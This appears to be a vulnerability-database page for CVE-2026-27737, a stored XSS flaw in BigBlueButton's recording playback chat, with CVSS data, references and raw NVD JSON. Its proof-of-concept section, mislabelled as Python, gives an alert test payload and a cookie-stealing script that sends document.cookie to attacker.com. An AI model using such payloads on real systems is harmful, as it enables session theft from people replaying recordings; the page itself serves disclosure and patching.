CVE-2026-27737

Description

BigBlueButton is an open-source virtual classroom. In versions prior to 3.0.19, the recording playback (presentation format) was not sanitizing user's input in public chat. This allowed for a malicious actor to craft and carry out a targeted XSS attack, activated on anyone replaying the recording. This issue has been fixed 3.0.19.

CVSS Details

CVSS Score

6.5

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N

Configurations (Affected Products)

No configuration data available.

BigBlueButton < 3.0.19

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

// Proof of Concept for CVE-2026-27737
// Attacker sends the following payload in the public chat during a live session.
// The payload is stored in the recording data and executes when the victim replays it.

// Payload 1: Simple XSS verification
var xssPayload = "<img src=x onerror=alert('CVE-2026-27737 Confirmed')>";

// Payload 2: Cookie Stealer (Example)
var stealPayload = "<script>fetch('https://attacker.com/steal?c='+document.cookie)</script>";

// The vulnerability occurs because the playback player renders the chat message
// as innerHTML without sanitization, causing the browser to execute the script.

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-27737
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-27737
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-27737/
[4] VulDB https://vuldb.com/cve/CVE-2026-27737
[5] https://github.com/bigbluebutton/bbb-playback/commit/09e89bfe4ff8488b68c3ff040d3081e419dc89b1
[6] https://github.com/bigbluebutton/bigbluebutton/commit/69f45aa1b963dc7d80179d0155acc670aec5c4fc
[7] https://github.com/bigbluebutton/bigbluebutton/releases/tag/v3.0.19
[8] https://github.com/bigbluebutton/bigbluebutton/security/advisories/GHSA-8vv7-vj94-q2pv
[9] https://github.com/blindsidenetworks/scalelite/releases/tag/v1.7.0

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-27737", "sourceIdentifier": "[email protected]", "published": "2026-05-18T22:16:37.523", "lastModified": "2026-05-19T15:04:09.490", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "BigBlueButton is an open-source virtual classroom. In versions prior to 3.0.19, the recording playback (presentation format) was not sanitizing user's input in public chat. This allowed for a malicious actor to craft and carry out a targeted XSS attack, activated on anyone replaying the recording. This issue has been fixed 3.0.19."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://github.com/bigbluebutton/bbb-playback/commit/09e89bfe4ff8488b68c3ff040d3081e419dc89b1", "source": "[email protected]"}, {"url": "https://github.com/bigbluebutton/bigbluebutton/commit/69f45aa1b963dc7d80179d0155acc670aec5c4fc", "source": "[email protected]"}, {"url": "https://github.com/bigbluebutton/bigbluebutton/releases/tag/v3.0.19", "source": "[email protected]"}, {"url": "https://github.com/bigbluebutton/bigbluebutton/security/advisories/GHSA-8vv7-vj94-q2pv", "source": "[email protected]"}, {"url": "https://github.com/blindsidenetworks/scalelite/releases/tag/v1.7.0", "source": "[email protected]"}]}}